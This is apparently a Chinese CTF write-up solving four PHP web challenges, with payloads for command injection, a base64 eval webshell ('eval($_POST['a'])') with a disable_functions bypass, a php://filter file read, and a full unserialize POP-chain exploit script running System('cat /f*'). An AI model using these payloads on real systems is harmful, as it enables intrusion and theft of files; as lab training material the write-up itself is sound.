[SWPUCTF 2023 秋季新生赛]Pingpingping 记一个小知识点
rce,php中[会被解析为_,get中不能用这个字符,用[代替
payload:
1 ?Ping[ip.exe=127.0.0.1;cat /f*
[GKCTF 2020]CheckIN 源码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo']; $this->decode = @base64_decode( $this->code ); @Eval($this->decode); } public function x() { return $_REQUEST; } } new ClassName();
请求传入的参数需要b64编码,传入的键为Ginkgo
phpinfo一下,payload:
1 ?Ginkgo=cGhwaW5mbygpOw==
pcntl,system,exec都被禁用,但没禁用eval
1 2 3 eval($_POST['a']); ZXZhbCgkX1BPU1RbJ2EnXSk7
传参后蚁剑连接,根目录下有flag和readflag,flag没有权限无法读取,readflag由于函数被禁无法运,要绕过disable_function,shell的php版本为7.3,采用concat绕过
[NISACTF 2022]easyssrf
提示ssrf,采用file协议测试
提示其他路径,试一下file:///flag
尝试fl4g,发现存在ha1x1ux1u.php,访问
过滤了file关键字,采用filter伪协议
1 ?file=php://filter/read=convert.base64-encode/resource=/flag
base64解码即可
[NISACTF 2022]babyserialize 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 <?php include "waf.php"; class NISA{ public $fun="show_me_flag"; public $txw4ever; public function __wakeup() { if($this->fun=="show_me_flag"){ hint(); } } function __call($from,$val){ $this->fun=$val[0]; } public function __toString() { echo $this->fun; return " "; } public function __invoke() { checkcheck($this->txw4ever); @eval($this->txw4ever); } } class TianXiWei{ public $ext; public $x; public function __wakeup() { $this->ext->nisa($this->x); } } class Ilovetxw{ public $huang; public $su; public function __call($fun1,$arg){ $this->huang->fun=$arg[0]; } public function __toString(){ $bb = $this->su; return $bb(); } } class four{ public $a="TXW4EVER"; private $fun='abc'; public function __set($name, $value) { $this->$name=$value; if ($this->fun = "sixsixsix"){ strtolower($this->a); } } } if(isset($_GET['ser'])){ @unserialize($_GET['ser']); }else{ highlight_file(__FILE__); } //func checkcheck($data){ // if(preg_match(......)){ // die(something wrong); // } //} //function hint(){ // echo "......."; // die(); //} ?>
NISA类有@eval,在__invoke方法内,看看哪里能把NISA类当作函数调用,发现$bb(),在__tostring下,Ilovetxw类中。触发__toString利用four类的strtolower,需要触发__set,其在设置不可访问的变量时触发, Ilovetxw没有fun变量设置了fun,可以触发__set。需要触发__call函数,在调用不存在的方法时触发,在TianXiWei类下有$this->ext->nisa($this->x);wakeup()在反序列化时触发。
注意修改NISA类下fun的值,否则会触发hint();waf掉了system,大写绕过
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 <?php class NISA{ public $fun="1"; public $txw4ever="System('cat /f*');";//1 public function __wakeup() { if($this->fun=="show_me_flag"){ hint(); } } function __call($from,$val){ $this->fun=$val[0]; } public function __toString() { echo $this->fun; return " "; } public function __invoke() { checkcheck($this->txw4ever); @eval($this->txw4ever); } } class TianXiWei{ public $ext;// Ilovetxw public $x; } class Ilovetxw{ public $huang;//four public $su; } class four{ public $a; private $fun='sixsixsix'; } $a= new TianXiWei(); $a->ext=new Ilovetxw(); $a->ext->huang=new four(); $a->ext->huang->a=new Ilovetxw(); $a->ext->huang->a->su=new NISA(); echo urlencode(serialize($a)); ?>
payload:
1 ?ser=O%3A9%3A"TianXiWei"%3A2%3A{s%3A3%3A"ext"%3BO%3A8%3A"Ilovetxw"%3A2%3A{s%3A5%3A"huang"%3BO%3A4%3A"four"%3A2%3A{s%3A1%3A"a"%3BO%3A8%3A"Ilovetxw"%3A2%3A{s%3A5%3A"huang"%3BN%3Bs%3A2%3A"su"%3BO%3A4%3A"NISA"%3A2%3A{s%3A3%3A"fun"%3Bs%3A1%3A"1"%3Bs%3A8%3A"txw4ever"%3Bs%3A18%3A"System('cat+%2Ff*')%3B"%3B}}s%3A9%3A"%00four%00fun"%3Bs%3A9%3A"sixsixsix"%3B}s%3A2%3A"su"%3BN%3B}s%3A1%3A"x"%3BN%3B}
